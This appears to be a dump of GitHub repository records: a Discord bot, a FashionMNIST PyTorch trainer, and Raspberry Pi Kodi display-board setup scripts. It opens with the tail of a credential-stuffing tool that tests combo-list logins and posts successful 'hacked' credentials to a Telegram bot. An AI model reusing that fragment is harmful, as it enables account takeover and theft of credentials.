Enjoy\")\n\t\t\tprint('--------------------------------'+colorama.Fore.RESET)\n\t\t\ttry:requests.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text={YES}\\nBY @TweakPY @vv1ck 💸')\n\t\t\texcept:pass\n\t\t\twith open('GOOD.txt', 'a') as x:\n\t\t\t\tx.write(f'{user}:{pess}'+'\\n')\n\t\telse:print(colorama.Fore.RED+f\"NOT HACKED : [{user}:{pess}]\"+colorama.Fore.RESET)\n\texcept requests.exceptions.ConnectionError:print(colorama.Fore.RED+\"[-] Bad Proxy !!\"+colorama.Fore.RESET)\n\texcept requests.exceptions.ReadTimeout:print(colorama.Fore.RED + \"[-] Bad Proxy !!\" + colorama.Fore.RESET)\n\texcept KeyboardInterrupt:exit(0)\ndef FILname():\n\tF=input('[+] Enter The Combo File Name : ')\n\tprint('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')\n\ttry:\n\t\tfor x in open(f'{F}.txt','r').read().splitlines():\n\t\t\tuser=x.split(\":\")[0]\n\t\t\tpess=x.split(\":\")[1]\n\t\t\tCHECK(user,pess)\n\texcept FileNotFoundError:\n\t\tprint(colorama.Fore.RED+'\\n[-] The file name is incorrect !\\n'+colorama.Fore.RESET)\n\t\treturn FILname()\nFILname()\n" } ]
2
gkdnr5148/ksp_bot
https://github.com/gkdnr5148/ksp_bot
092483ce2c1f72f84b9d458f13df6448305bf622
b76ba6d1370609ea5631d03e3b3bfccb10fe4105
fe0ab0c2f9628355c17f65b6c0e8edd720ed0144
refs/heads/master
2020-05-24T12:30:56.753954
2019-05-17T21:02:36
2019-05-17T21:02:36
187,269,738
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6468144059181213, "alphanum_fraction": 0.6509695053100586, "avg_line_length": 25.769229888916016, "blob_id": "f7a9b29b37b92fafce718b8df1a94f0b13ff3f27", "content_id": "7dc5b96565ebd4f0c09af74ecaff37c3078b1442", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 784, "license_type": "no_license", "max_line_length": 77, "num_lines": 26, "path": "/scrim.py", "repo_name": "gkdnr5148/ksp_bot", "src_encoding": "UTF-8", "text": "import discord\r\nimport os\r\nclient = discord.Client()\r\n\r\n\r\[email protected]\r\nasync def on_ready():\r\n print(client.user.id)\r\n print(\"ready\")\r\n game = discord.Game(\"KSP_SCRIM BOT\")\r\n await client.change_presence(status=discord.Status.online, activity=game)\r\n\r\n\r\n\r\[email protected]\r\nasync def on_message(message):\r\n if message.content.startswith(\"!서버\"):\r\n await message.channel.send(\"```도쿄GCE1```\")\r\n if message.content.startswith(\"!안내\"):\r\n await message.channel.send(\"@everyone 금일부터 시간표가 변경되었습니다.\")\r\n if message.content.startswith(\"!카운트1\"):\r\n await message.channel.send(\"a!scrim countdown 1 곧시작합니다.\")\r\n\r\n \r\naccess_token = os.environ[\"BOT_TOKEN\"] \r\nclient.run(access_token)\r\n" } ]
1
mridul-eecs/FashionMNIST_pytorch
https://github.com/mridul-eecs/FashionMNIST_pytorch
6eb34d51b4921abe092258d921fb678f80a91cf3
6a46278f75548bac983068ad386e5a8991cf4bec
7c2ce1670c327eb7f5b8cb2b9640d3d001448fd5
refs/heads/master
2020-08-21T10:40:39.463524
2019-11-20T05:23:46
2019-11-20T05:23:46
216,141,961
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5890731811523438, "alphanum_fraction": 0.6146341562271118, "avg_line_length": 33.15999984741211, "blob_id": "4be179068cae9198172b52025806c2ced919a964", "content_id": "4dd9b11a724356019e8985ff35563edfb9f91e75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5125, "license_type": "no_license", "max_line_length": 145, "num_lines": 150, "path": "/main.py", "repo_name": "mridul-eecs/FashionMNIST_pytorch", "src_encoding": "UTF-8", "text": "import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms.transforms as transforms\nimport torch.nn.functional as func\n\nprint(torch.cuda.is_available())\nprint(torch.__version__)\n\n\ntrain_set= torchvision.datasets.FashionMNIST(\n train= True,\n root= '../data/FashionMNIST/train/',\n download= True,\n transform= transforms.Compose([transforms.ToTensor()])\n)\ntest_set= torchvision.datasets.FashionMNIST(\n train= False,\n root= '../data/FashionMNIST/test/',\n download= True,\n transform= transforms.Compose([transforms.ToTensor()])\n)\nprint(\"train set:\", len(train_set))\nprint(\"test set:\", len(test_set))\n\n\n\n# Network\n# formula for channels \n\nclass Network(nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n # Convolutional layer1\n self.conv1= nn.Sequential()\n self.conv1.add_module(\"conv1\", nn.Conv2d(in_channels= 1, out_channels= 6, kernel_size= 5))\n self.conv1.add_module(\"bn1\", nn.BatchNorm2d(num_features= 6, eps= 1e-05, momentum= 0.1, affine= True))\n self.conv1.add_module(\"relu\", nn.ReLU(inplace= False))\n self.conv1.add_module(\"pool\", nn.MaxPool2d(kernel_size= 2, stride= 2))\n\n # Convolutional layer2\n self.conv2= nn.Sequential()\n self.conv2.add_module(\"conv2\", nn.Conv2d(in_channels= 6, out_channels= 12, kernel_size= 5))\n self.conv2.add_module(\"bn2\", nn.BatchNorm2d(num_features= 12, eps= 1e-05, momentum= 0.1, affine= True))\n self.conv2.add_module(\"relu\", nn.ReLU(inplace= False))\n self.conv2.add_module(\"pool\", nn.MaxPool2d(kernel_size= 2, stride= 2))\n\n # Linear layer1\n self.fc1= nn.Sequential()\n self.fc1.add_module(\"linear\", nn.Linear(in_features= 12*4*4, out_features= 120))\n # self.fc1.add_module(\"bn3\", nn.BatchNorm1d(num_features= 120, eps= 1e-05, momentum= 0.1, affine= True))\n self.fc1.add_module(\"relu\", nn.ReLU(inplace= False))\n \n # Linear layer2\n self.fc2= nn.Sequential()\n self.fc2.add_module(\"linear\", nn.Linear(in_features= 120, out_features= 60))\n #self.fc2.add_module(\"bn4\", nn.BatchNorm1d(num_features= 60, eps= 1e-5, momentum= 0.1, affine= True))\n self.fc2.add_module(\"relu\", nn.ReLU(inplace= False))\n\n # Output layer\n self.out= nn.Sequential()\n self.out.add_module(\"output\", nn.Linear(in_features= 60, out_features= 10))\n # by default activation function is softmax\n\n def forward(self, t):\n t= t\n t= self.conv1(t)\n t= self.conv2(t)\n t= t.reshape(-1, 12*4*4)\n t= self.fc1(t)\n t= self.fc2(t)\n t= self.out(t)\n return t\n\n\n# train test epochs\ndevice= torch.device('cuda')\nnetwork= Network()\ntrain_loader= torch.utils.data.DataLoader(train_set, batch_size= 5000)\ntest_loader= torch.utils.data.DataLoader(test_set, batch_size= 5000)\noptimizer= optim.Adam(network.parameters(), lr= 0.1)\ntest_batch= next(iter(test_loader))\n\n# gpu specific\n network.cuda()\n\nepochs= 200\nfor epoch in range(1, epochs):\n i= 0\n for batch in train_loader:\n i+=1\n images, labels= batch\n images= images.to('cuda')\n labels= labels.to('cuda')\n if 
epoch == 1 and i == 1:\n #First time check and resume checkpoint\n try:\n print('resuming')\n checkpoint = torch.load('model/checkpoint')\n network.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n epoch = checkpoint['epoch']\n loss = checkpoint['loss']\n network.train()\n print('epoch', epoch)\n except:\n pass\n \n # .to(cuda) for GPU\n\n preds= network(images)\n train_loss= func.cross_entropy(preds, labels)\n\n optimizer.zero_grad()\n train_loss.backward(retain_graph=True)\n optimizer.step()\n \n images, labels= test_batch\n # .to(cuda) for GPU\n images= images.to('cuda')\n labels= labels.to('cuda')\n preds= network(images)\n test_loss= func.cross_entropy(preds, labels)\n\n # checkpoint\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': network.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': test_loss,\n }, 'model/checkpoint')\n\n print('training on epoch: {} and batch: {}, train loss: {:.2f}, test loss: {:.2f}'.format(epoch, i, train_loss.item(), test_loss.item()))\n PATH= 'model/checkpoint_{:.2f}'.format(test_loss.item())\n torch.save(network.state_dict(), PATH)\n\n\n\n# final testing:\ndef get_num_correct(preds, labels):\n return torch.argmax(preds, dim= 1).eq(labels).sum()\n\nnetwork= network.eval()\ntest_loader= torch.utils.data.DataLoader(test_set, batch_size= 10000)\nimages, labels= test_batch\nimages= images.to('cuda')\nlabels= labels.to('cuda')\npreds= network(images)\nprint('correctly classified from 10000 images:', get_num_correct(preds, labels).item())\n\n" }, { "alpha_fraction": 0.6019600629806519, "alphanum_fraction": 0.639653205871582, "avg_line_length": 35.84722137451172, "blob_id": "39e4920a30af9c124db02bbe7c43639e7e8e7832", "content_id": "c279cbd77182459f6307557a743a61a3aecb2bcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2653, "license_type": "no_license", "max_line_length": 113, "num_lines": 72, "path": "/test.py", "repo_name": "mridul-eecs/FashionMNIST_pytorch", "src_encoding": "UTF-8", "text": "import torch\nimport torchvision\nfrom torchvision.transforms import transforms\nfrom torch import nn\n\nclass Network(nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n # Convolutional layer1\n self.conv1= nn.Sequential()\n self.conv1.add_module(\"conv1\", nn.Conv2d(in_channels= 1, out_channels= 6, kernel_size= 5))\n self.conv1.add_module(\"bn1\", nn.BatchNorm2d(num_features= 6, eps= 1e-05, momentum= 0.1, affine= True))\n self.conv1.add_module(\"relu\", nn.ReLU(inplace= False))\n self.conv1.add_module(\"pool\", nn.MaxPool2d(kernel_size= 2, stride= 2))\n\n # Convolutional layer2\n self.conv2= nn.Sequential()\n self.conv2.add_module(\"conv2\", nn.Conv2d(in_channels= 6, out_channels= 12, kernel_size= 5))\n self.conv2.add_module(\"bn2\", nn.BatchNorm2d(num_features= 12, eps= 1e-05, momentum= 0.1, affine= True))\n self.conv2.add_module(\"relu\", nn.ReLU(inplace= False))\n self.conv2.add_module(\"pool\", nn.MaxPool2d(kernel_size= 2, stride= 2))\n\n # Linear layer1\n self.fc1= nn.Sequential()\n self.fc1.add_module(\"linear\", nn.Linear(in_features= 12*4*4, out_features= 120))\n # self.fc1.add_module(\"bn3\", nn.BatchNorm1d(num_features= 120, eps= 1e-05, momentum= 0.1, affine= True))\n self.fc1.add_module(\"relu\", nn.ReLU(inplace= False))\n \n # Linear layer2\n self.fc2= nn.Sequential()\n self.fc2.add_module(\"linear\", nn.Linear(in_features= 120, out_features= 60))\n #self.fc2.add_module(\"bn4\", 
nn.BatchNorm1d(num_features= 60, eps= 1e-5, momentum= 0.1, affine= True))\n self.fc2.add_module(\"relu\", nn.ReLU(inplace= False))\n\n # Output layer\n self.out= nn.Sequential()\n self.out.add_module(\"output\", nn.Linear(in_features= 60, out_features= 10))\n # by default activation function is softmax\n\n def forward(self, t):\n t= t\n t= self.conv1(t)\n t= self.conv2(t)\n t= t.reshape(-1, 12*4*4)\n t= self.fc1(t)\n t= self.fc2(t)\n t= self.out(t)\n return t\n\n\ntest_set= torchvision.datasets.FashionMNIST(\n train= False,\n root= '../data/FashionMNIST/test/',\n download= True,\n transform= transforms.Compose([transforms.ToTensor()])\n)\n\nPATH= 'model/checkpoint'\n\nprint(PATH)\nmodel= Network()\ndevice = torch.device(\"cpu\")\ncheckpoint = torch.load(PATH)\nmodel.load_state_dict(checkpoint['model_state_dict'])\nmodel.to(device)\nmodel= model.eval()\n\ntest_loader= torch.utils.data.DataLoader(test_set, batch_size= 1)\nbatch= next(iter(test_loader))\nimages, labels= batch\npred= model(images)\nprint(torch.argmax(pred), labels.item())\n" }, { "alpha_fraction": 0.8617021441459656, "alphanum_fraction": 0.8617021441459656, "avg_line_length": 46, "blob_id": "649e04b5ad257093c1f79ef6fdcba89ee9520361", "content_id": "24d6abfdbc60fb4acce28cc83e090490a334171b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 94, "license_type": "no_license", "max_line_length": 70, "num_lines": 2, "path": "/README.md", "repo_name": "mridul-eecs/FashionMNIST_pytorch", "src_encoding": "UTF-8", "text": "# FashionMNIST_pytorch\nFashion MNIST implementation on pytorch using dataset from torchvision\n" } ]
3
UMDSpaceSystemsLab/DisplayBoards
https://github.com/UMDSpaceSystemsLab/DisplayBoards
c19d5106636acd8e8ac94bd6d3c99e14ba1a10f9
d42aad6a15dfe9cc5a63dbb19efe112534b91a5e
aaa5683701d391558f475c12036e40bd9834c98b
refs/heads/master
2021-01-18T22:41:16.606620
2016-04-28T21:58:43
2016-04-28T21:58:43
42,799,066
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6304736137390137, "alphanum_fraction": 0.650580883026123, "avg_line_length": 25.630952835083008, "blob_id": "627fde388482ec4e184d5ed8ddcff2f49e97c9ea", "content_id": "f6b277853ace56a907da5edd63c8ac4d97a32f3b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2238, "license_type": "permissive", "max_line_length": 127, "num_lines": 84, "path": "/patch_image.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Image patcher for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m ** $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [image-to-patch]\"\n\texit 1\nfi\n\nif [ ! -f \"$1\" ];then\n\tbecho \"ERROR: File '$1' does not exist!\"\n\texit 1\nfi\n\nif [ ! \"`whoami`\" = \"root\" ];then\n\tbecho \"You need to be root to use this tool.\"\n\t\n\tsudo_loc=`which sudo`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with sudo.\"\n\t\tsudo $0 $@\n\t\texit $?\n\tfi\n\t\n\tsu_loc=`which su`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with su.\"\n\t\tsu -c \"$0 $@\"\n\t\texit $?\n\tfi\n\t\n\tbecho \"ERROR: You must be root to use this tool!\"\n\texit 1\nfi\n\nbecho \"Setting up environment...\"\n\nbbecho \"Preparing work directory...\"\nrm -rf workdir; cerr $?\nmkdir -p workdir; cerr $?\n\nbbecho \"Entering work directory...\"\ncd workdir; cerr $?\n\nbecho \"Extracting image...\"\nunsquashfs \"$SCRIPT_DIR/$1\"; cerr $?\n\nbecho \"Backing up original image...\"\nmv \"$SCRIPT_DIR/$1\" \"$SCRIPT_DIR/$1.backup\"; cerr $?\n\nbecho \"Entering image directory...\"\ncd squashfs-root; cerr $?\n\nbecho \"Patching image...\"\n\n## Place any filesystem modifying commands here!\nbbecho \"Removing systemd version service...\"\nrm usr/lib/systemd/system/show-version.service; cerr $?\nbbecho \"Replacing splash screen with SSL one...\"\ncp \"$SCRIPT_DIR/resources/Splash.png\" usr/share/kodi/media/Splash.png; cerr $?\ncp \"$SCRIPT_DIR/resources/Splash.png\" usr/share/xbmc/media/Splash.png; cerr $?\n## END filesystem modifying commands.\n\nbecho \"Exiting image directory...\"\ncd ..; cerr $?\n\nbecho \"Rebuilding image...\"\nmksquashfs squashfs-root \"$SCRIPT_DIR/$1\" -b 1024k -comp lzo; cerr $?\n\nbecho \"Exiting environment...\"\ncd ..; cerr $?\n\nbecho \"Restoring permissions on image file...\"\nchown --reference=\"$SCRIPT_DIR/$1.backup\" \"$SCRIPT_DIR/$1\"; cerr $?\nchmod --reference=\"$SCRIPT_DIR/$1.backup\" \"$SCRIPT_DIR/$1\"; cerr $?\n\nbecho \"Finished patching image '$1'.\"\nbecho \"Patched directory in workdir/. 
Delete it if you don't need it.\"\n\n" }, { "alpha_fraction": 0.5868814587593079, "alphanum_fraction": 0.6237053871154785, "avg_line_length": 27.032258987426758, "blob_id": "74ec30098823575e5ea59af51c5b2e5c27117cf8", "content_id": "765fee7a12706cea457f50453829cc12d36fd675", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 869, "license_type": "permissive", "max_line_length": 127, "num_lines": 31, "path": "/install_oemsplash.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Configuration installer for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m ** $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -f \"$1/SYSTEM\" ];then\n\tbecho \"ERROR: Path '$1' does not seem to be the system partition!\"\n\texit 1\nfi\n\nbecho \"Installing OEM splash screen for SSL...\"\n\ncp resources/oemsplash.png \"$1\"; cerr $?\ncp resources/SSL.png \"$1\"; cerr $?\n\nbecho \"Finished installing OEM splash screen for SSL.\"\n" }, { "alpha_fraction": 0.67472243309021, "alphanum_fraction": 0.6838667392730713, "avg_line_length": 36.317073822021484, "blob_id": "2854833934107ddb8c4ab463bf96d12bcdfdbe8b", "content_id": "a356bc8ce558dfa0d3e8d0c089ac43e89f2367eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1531, "license_type": "permissive", "max_line_length": 119, "num_lines": 41, "path": "/README.md", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "# DisplayBoards\nThis is a repo for the SBC display computers attached to the numerous Television displayboards at the Space Systems Lab\n\n# Instructions\n\n 1. Install your favorite OpenELEC image first. Copy it to your SD card\n as such:\n \n sudo dd if=OpenELEC-RPi2.arm-6.0.3.img of=/dev/sdc bs=4M\n \n (Note - your OpenELEC image may vary!)\n\n 2. Unplug and boot with your RPi. Once it has booted (it says it wants to\n reboot), unplug it!\n\n 3. Set up your `SSL_DISPLAYBOARD_ARC_PASS` environment variable to the\n archive password, e.g.\n \n export SSL_DISPLAYBOARD_ARC_PASS=\"MyPasswordHere\"\n \n (It may be useful to store the above line in your `.bashrc`, or in a\n script that you can easily source.)\n\n 4. Mount the system and data partition, and run:\n \n ./install_all.sh /path/to/mounted/mini/system/partition /path/to/mounted/data/partition\n \n * If you want to enable (force) composite output, add `-c`:\n \n ./install_all.sh /path/to/mounted/mini/system/partition /path/to/mounted/data/partition -c\n \n * If you want to enable (force) 16:9 composite output, add `-w`:\n \n ./install_all.sh /path/to/mounted/mini/system/partition /path/to/mounted/data/partition -w\n \n 5. That's it! Go ahead and boot your shiny new SD card!\n \n 6. (OPTIONAL) If you are using composite mode, you can go into\n `System > Settings > System > Video Output > Video calibration...`\n to adjust the overscan. 
This would allow all of the contents of the\n screen to be seen.\n\n" }, { "alpha_fraction": 0.5864240527153015, "alphanum_fraction": 0.6123163104057312, "avg_line_length": 23.220338821411133, "blob_id": "4f3fbcf2446f239cf6b61b0194741f825177b25d", "content_id": "e37f790157f0e2e508a8dd1e57ce3d06a41f88c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1429, "license_type": "permissive", "max_line_length": 127, "num_lines": 59, "path": "/install_patched_image.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Patched image installer for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m -- $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -f \"$1/SYSTEM\" ];then\n\tbecho \"ERROR: Path '$1' does not seem to be the system partition!\"\n\texit 1\nfi\n\nif [ ! \"`whoami`\" = \"root\" ];then\n\tbecho \"You need to be root to use this tool.\"\n\t\n\tsudo_loc=`which sudo`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with sudo.\"\n\t\tsudo -E $0 $@\n\t\texit $?\n\tfi\n\t\n\tsu_loc=`which su`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with su.\"\n\t\tsu -p -c \"$0 $@\"\n\t\texit $?\n\tfi\n\t\n\tbecho \"ERROR: You must be root to use this tool!\"\n\texit 1\nfi\n\nbecho \"Cleaning up any old files...\"\nrm -f SYSTEM SYSTEM.backup; cerr $?\n\nbecho \"Copying original system image...\"\ncp \"$1/SYSTEM\" .; cerr $?\n\nbecho \"Patching image...\"\n\"$SCRIPT_DIR/patch_image.sh\" SYSTEM; cerr $?\n\nbecho \"Installing patched image...\"\ncp \"SYSTEM\" \"$1/SYSTEM\"; cerr $?\n\nbecho \"Finished installing patched system image for SSL.\"\n" }, { "alpha_fraction": 0.6191214323043823, "alphanum_fraction": 0.6454780101776123, "avg_line_length": 27.455883026123047, "blob_id": "05040c0c5c7416a51d5b2b48c8c7ff7f48def955", "content_id": "2f5b9c5906342fa4d2c74668099b9abb8f4a9f6d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1935, "license_type": "permissive", "max_line_length": 127, "num_lines": 68, "path": "/build_config_archive.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Configuration archive creator for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m ** $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\nARC=\"resources/kodi-config-enc.tar.7z\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-data-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ -z \"$SSL_DISPLAYBOARD_ARC_PASS\" ];then\n\tbecho \"ERROR: Variable SSL_DISPLAYBOARD_ARC_PASS not set! 
This is required to lock the archive!\"\n\texit 1\nfi\n\nif [ ! \"`whoami`\" = \"root\" ];then\n\tbecho \"You need to be root to use this tool.\"\n\t\n\tsudo_loc=`which sudo`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with sudo.\"\n\t\tsudo -E $0 $@\n\t\texit $?\n\tfi\n\t\n\tsu_loc=`which su`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with su.\"\n\t\tsu -p -c \"$0 $@\"\n\t\texit $?\n\tfi\n\t\n\tbecho \"ERROR: You must be root to use this tool!\"\n\texit 1\nfi\n\nbecho \"Creating configuration archive...\"\n\nbbecho \"Removing any old archives...\"\n[ -f \"$ARC\" ] && mv \"$ARC\" \"$ARC\".old && bbecho \"Created backup: kodi-config-enc.tar.7z.old\"\n\nbbecho \"Entering Kodi data partition directory...\"\ncd \"$1\"; cerr $?\n\nbbecho \"Creating \\033[32mencrypted\\033[0m\\033[1m configuration archive...\"\nsleep 3s\ntar cf - \".kodi\" \".cache\" | 7z a -si \"$SCRIPT_DIR/$ARC\" -mhe -p\"$SSL_DISPLAYBOARD_ARC_PASS\"\ncerr $?\n\nbbecho \"Returning to script directory...\"\ncd \"$SCRIPT_DIR\"; cerr $?\n\nbecho \"Restoring permissions on configuration archive...\"\nchown --reference=\"resources/oemsplash.png\" \"$SCRIPT_DIR/$ARC\"; cerr $?\nchmod --reference=\"resources/oemsplash.png\" \"$SCRIPT_DIR/$ARC\"; cerr $?\n\nbecho \"Finished creating Kodi configuration archive $ARC.\"\n" }, { "alpha_fraction": 0.6110183596611023, "alphanum_fraction": 0.6494156718254089, "avg_line_length": 30.526315689086914, "blob_id": "62ca2637cf5ebc3ea771a8daabaddd08e494e069", "content_id": "85ef87ae4eaa9648ac49cf149726a7fecdf96c54", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1198, "license_type": "permissive", "max_line_length": 127, "num_lines": 38, "path": "/install_display_config_rpi1_ratio169.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Composite display 16:9 ratio configuration installer for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m ** $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! 
-f \"$1/config.txt\" ];then\n becho \"ERROR: Configuration file config.txt not found in system partition!\"\n becho \" Are you sure you specified the correct directory?\"\n exit 1\nfi\n\ngrep \"^sdtv_aspect\\=\" \"$1/config.txt\" 2>/dev/null >/dev/null\n\nif [ \"$?\" = \"0\" ];then\n becho \"ERROR: Configuration file config.txt already has configuration for composite ratio!\"\n exit 1\nfi\n\nbecho \"Installing composite display 16:9 ratio configuration for RPi1...\"\n\necho \"sdtv_aspect=3\" >> \"$1/config.txt\"\n\nbecho \"Finished installing composite display 16:9 ratio configuration for RPi1.\"\n" }, { "alpha_fraction": 0.7630661725997925, "alphanum_fraction": 0.7839721441268921, "avg_line_length": 34.875, "blob_id": "eec407e9c7ce495c82598b8d9dee2753fe52db9d", "content_id": "e7e5de1490089e2d1c26cb3990707d45f1dac450", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 287, "license_type": "permissive", "max_line_length": 63, "num_lines": 8, "path": "/resources/autoexec.py", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "# place at ~/.kodi/userdata/autoexec.py\nimport xbmc\nimport time\nxbmc.executebuiltin(\"XBMC.ReplaceWindow(1234)\")\ntime.sleep(0.1)\nxbmc.executebuiltin('PlayMedia(\"/storage/videos/SSL\",\"isdir\")')\nxbmc.executebuiltin('xbmc.PlayerControl(repeatall)')\nxbmc.executebuiltin(\"Action(Fullscreen)\")\n" }, { "alpha_fraction": 0.5516348481178284, "alphanum_fraction": 0.5778568983078003, "avg_line_length": 28.701923370361328, "blob_id": "dd0c648c57dd857e3e7a498ff3c44f7f9529e802", "content_id": "99d3828b4f7dcfbed8c396f92a7e5251fac25389", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3089, "license_type": "permissive", "max_line_length": 127, "num_lines": 104, "path": "/install_all.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Super installer for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m == $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"2\" ] && [ \"$#\" != \"3\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition] [path-to-kodi-data-partition] [-c|-w]\"\n becho \" -c | --composite Force composite video output for RPi.\"\n becho \" You may also set ENABLE_COMPOSITE=1 to enable\"\n becho \" this option.\"\n becho \" -w | --composite169 Force 16:9 composite video output for RPi.\"\n becho \" You may also set ENABLE_COMPOSITE=2 to enable\"\n becho \" this option.\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -d \"$2\" ];then\n\tbecho \"ERROR: Path '$2' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! 
